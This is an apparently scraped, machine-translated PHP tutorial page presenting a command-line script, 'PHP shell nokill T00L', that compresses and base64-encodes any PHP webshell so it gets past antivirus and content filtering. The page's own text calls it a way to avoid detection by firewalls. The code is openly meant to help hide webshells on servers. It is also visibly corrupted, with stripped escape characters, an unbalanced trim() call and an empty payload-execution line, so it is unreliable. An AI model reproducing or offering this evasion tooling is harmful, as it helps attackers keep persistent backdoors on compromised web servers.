PHP shell super anti-virus and size reduction tool implementation code

PHP shell super anti-virus and size reduction tool implementation code_PHP tutorial

WBOY

Release： 2016-07-21 15:14:44

Original

1009 people have browsed it

Written by lostwolf
This is not a webshell, just a webshell anti-virus tool
Do not use the original webshell
Only anti-virus phpwebshell
This tool runs in cli mode!
If there is file content filtering that cannot be broken through, you can try this tool to avoid killing Malaysia!
Any php webshell can bypass some domestic BitTorrent firewalls after coding with this tool

Copy the code The code is as follows:

 
/* 
Title: PHP shell nokill T00L 
Blog: exploit-db.blogcn.com 
*/ 
error_reporting(0); 
@ini_set( 'memory_limit','-1'); 
set_time_limit(0); 
$toolname="$argv[0]"; 
if ($argc<2) { 
baner($toolname ); 
die; 
} 
$input_file= trim($argv[1]); 
$output_file='nokill_'.$input_file; 
if (file_exists($input_file)) { 
No_kill_c0de($input_file,$output_file); 
echo "PHP shell nokill T00Lrn"; 
echo "Blog: exploit-db.blogcn.comrn"; 
echo "Input: {$input_file }rn"; 
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file; 
echo "[+] Generate success!rn"; 
echo "Saved to {$file_full_path}"."rn" ; 
} else { 
echo "PHP shell nokill T00Lrn"; 
echo "Blog: exploit-db.blogcn.comrn"; 
die("[-] Failed ! The File $input_file does not exist"); 
} 
function No_kill_c0de($input_file,$output_file){ 
$no_whitespace=php_strip_whitespace($input_file); 
$no_php_tag=trim(trim(trim($no_whitespace,' '); 
$enfile=base64_encode(gzdeflate($no_php_tag)); 
$shellcode="x3cx3fx70x68x70xdxa"; 
$ shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."xdxa"; 
$shellcode.=""; 
$shellcode.=" x3fx3e"; 
file_put_contents("$output_file",$shellcode); 
} 
function baner($toolname){ 
echo "PHP shell nokill T00Lrn"; 
echo "Blog: exploit -db.blogcn.comrn"; 
echo "Usage: {$toolname} phpwebshellrn"; 
} 
?> 